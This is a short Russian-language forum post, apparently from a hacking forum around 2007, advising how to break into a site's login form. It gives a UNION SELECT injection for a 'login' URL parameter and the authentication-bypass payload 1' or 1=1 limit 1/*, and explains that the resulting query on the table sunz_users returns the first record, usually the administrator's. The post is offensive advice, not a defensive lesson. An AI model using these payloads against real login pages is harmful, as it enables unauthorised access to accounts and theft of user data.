запрос вида
?login=-1'+union+select+someshit+from+sometable/*
поможет)
имена таблиц и столбцов надо подбирать.
а зачем?
просто ввести в поле
Код:
1' or 1=1 limit 1/*
и все...
запрос который выполнится будет
Код:
SELECT * FROM `sunz_users` WHERE `login` = '1' or 1=1 limit 1;
другими словами выбрать все данные из таблицы `sunz_users` там где поле login = 1 или если 1=1, а т.к. 1 всегда равно 1 то благодаря limit 1 запрос выбирает из таблицы первые записи (обычно админские) кстати limit 1 необязательно
__________________ Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 31.08.2007 в 00:24..